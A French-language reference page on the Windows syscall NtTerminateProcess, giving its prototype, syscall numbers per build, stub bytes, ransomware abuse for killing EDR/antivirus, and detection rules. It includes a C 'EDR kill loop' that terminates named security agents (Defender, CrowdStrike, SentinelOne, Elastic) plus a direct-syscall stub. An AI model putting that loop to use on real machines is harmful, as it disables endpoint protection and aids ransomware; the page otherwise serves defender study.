> Windows Syscalls
ntoskrnl.exeT1562.001T1489T1106

NtTerminateProcess

Termine un processus cible et tous ses threads avec un code de sortie donné.

Prototype

NTSTATUS NtTerminateProcess(
  HANDLE   ProcessHandle,
  NTSTATUS ExitStatus
);

Arguments

NameTypeDirDescription
ProcessHandleHANDLEinHandle vers le processus à terminer. Requiert PROCESS_TERMINATE. NULL signifie « terminer tous les threads du processus courant sauf l'appelant ».
ExitStatusNTSTATUSinCode de sortie rapporté par GetExitCodeProcess et enregistré dans l'objet processus.

IDs de syscalls par version de Windows

Version de WindowsID de syscallBuild
Win10 15070x2Cwin10-1507
Win10 16070x2Cwin10-1607
Win10 17030x2Cwin10-1703
Win10 17090x2Cwin10-1709
Win10 18030x2Cwin10-1803
Win10 18090x2Cwin10-1809
Win10 19030x2Cwin10-1903
Win10 19090x2Cwin10-1909
Win10 20040x2Cwin10-2004
Win10 20H20x2Cwin10-20h2
Win10 21H10x2Cwin10-21h1
Win10 21H20x2Cwin10-21h2
Win10 22H20x2Cwin10-22h2
Win11 21H20x2Cwin11-21h2
Win11 22H20x2Cwin11-22h2
Win11 23H20x2Cwin11-23h2
Win11 24H20x2Cwin11-24h2
Server 20160x2Cwinserver-2016
Server 20190x2Cwinserver-2019
Server 20220x2Cwinserver-2022
Server 20250x2Cwinserver-2025

Module noyau

ntoskrnl.exeNtTerminateProcess

APIs liées

TerminateProcessExitProcessNtTerminateThreadNtSuspendProcessNtOpenProcess

Stub du syscall

4C 8B D1            mov r10, rcx
B8 2C 00 00 00      mov eax, 0x2C
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Notes non documentées

NtTerminateProcess garde le SSN `0x2C` sur tous les builds Windows 10 / 11 / Server. C'est l'implémentation noyau derrière TerminateProcess / ExitProcess et il est aussi appelé implicitement par `_exit` du runtime C et par les finalizers SEH d'exception non gérée. L'appeler avec ProcessHandle == NULL est un raccourci documenté pour tuer tous les threads du processus courant hormis l'appelant — la seconde moitié du teardown d'`ExitProcess`.

Usage courant par les malwares

L'abus définitoire est le **kill d'EDR / AV** (T1562.001). Les ransomwares modernes (Conti, LockBit, BlackCat/ALPHV, Royal, Akira) et les frameworks post-exploitation associent couramment un driver vulnérable BYOVD (zemana, gmer, RTCore64) avec un binaire usermode qui parcourt la liste des processus, matche contre une allowlist hardcodée de noms d'EDR (MsMpEng, Sense, CSFalconService, elastic-agent, ...) et soit descend au noyau pour invoquer directement ZwTerminateProcess, soit — une fois le callback de protection de l'EDR neutralisé — appelle NtTerminateProcess depuis l'usermode avec PROCESS_TERMINATE. Autres usages : interrompre un processus helper injecté après livraison de payload de mouvement latéral, et droppers auto-destructifs après passage au second stage.

Opportunités de détection

Les callbacks PsSetCreateProcessNotifyRoutineEx se déclenchent à la sortie de processus avec `Create` == FALSE et incluent à la fois le terminateur et la PID victime ; c'est la télémétrie reine. Sysmon Event ID 5 (`ProcessTerminate`) est bien plus léger et n'a pas le champ terminateur. ETW `Microsoft-Windows-Kernel-Process/ProcessStop` fournit les mêmes données. Règle haute fidélité : tout processus non System, non csrss qui termine un processus dont le chemin image vit sous `Program Files\Windows Defender`, `Program Files\Microsoft\Windows Defender Advanced Threat Protection`, `Program Files\CrowdStrike`, `Program Files\SentinelOne` ou racines EDR similaires. Coupler avec la télémétrie d'auto-protection EDR (tentatives de violation PPL sur le `MsMpEng.exe` de Defender).

Exemples de syscalls directs

asmx64 direct stub

; Direct syscall stub for NtTerminateProcess (SSN 0x2C, all builds)
NtTerminateProcess PROC
    mov  r10, rcx          ; syscall convention
    mov  eax, 2Ch          ; SSN
    syscall
    ret
NtTerminateProcess ENDP

cEDR kill loop (defensive PoC)

// Defensive PoC: enumerate processes, match against an EDR allowlist,
// and call NtTerminateProcess directly. Assumes prerequisites (token theft
// to SYSTEM, EDR protection callback already stripped via BYOVD) are met.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

typedef NTSTATUS (NTAPI *pNtTerminateProcess)(HANDLE, NTSTATUS);

static const wchar_t *kTargets[] = {
    L"MsMpEng.exe", L"MsSense.exe", L"CSFalconService.exe",
    L"elastic-agent.exe", L"SentinelAgent.exe", NULL,
};

void KillEDRs(void) {
    pNtTerminateProcess NtTerminateProcess = (pNtTerminateProcess)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtTerminateProcess");

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32W pe = { sizeof pe };
    for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
        for (size_t i = 0; kTargets[i]; ++i) {
            if (_wcsicmp(pe.szExeFile, kTargets[i]) == 0) {
                HANDLE h = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
                if (h) { NtTerminateProcess(h, 0); CloseHandle(h); }
            }
        }
    }
    CloseHandle(snap);
}

rustself-destruct on completion

// Cargo: windows-sys = "0.59" (Win32_System_Threading, Win32_Foundation)
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::Threading::GetCurrentProcess;

extern "system" {
    fn NtTerminateProcess(ProcessHandle: HANDLE, ExitStatus: i32) -> i32;
}

pub fn self_destruct(code: i32) -> ! {
    unsafe { NtTerminateProcess(GetCurrentProcess(), code); }
    loop {}
}

Mappings MITRE ATT&CK

Last verified: 2026-05-20